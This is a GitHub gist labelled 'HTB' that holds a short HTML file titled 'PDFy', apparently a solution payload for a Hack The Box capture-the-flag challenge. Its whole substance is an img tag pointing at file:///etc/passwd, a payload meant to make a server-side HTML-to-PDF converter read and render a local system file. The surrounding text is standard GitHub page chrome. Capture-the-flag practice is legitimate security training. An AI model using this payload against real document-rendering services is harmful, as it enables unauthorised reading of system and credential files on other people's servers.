Last active
April 15, 2024 19:47
-
-
Save rubenflush/ef6dd976cdc65d459c13eff217f12dbb to your computer and use it in GitHub Desktop.
HTB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<head> | |
<meta name="viewport" content="width=device-width, initial-scale=1"> | |
<title>PDFy</title> | |
</head> | |
<body> | |
<img src="file:///etc/passwd"> | |
</body> | |
</html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment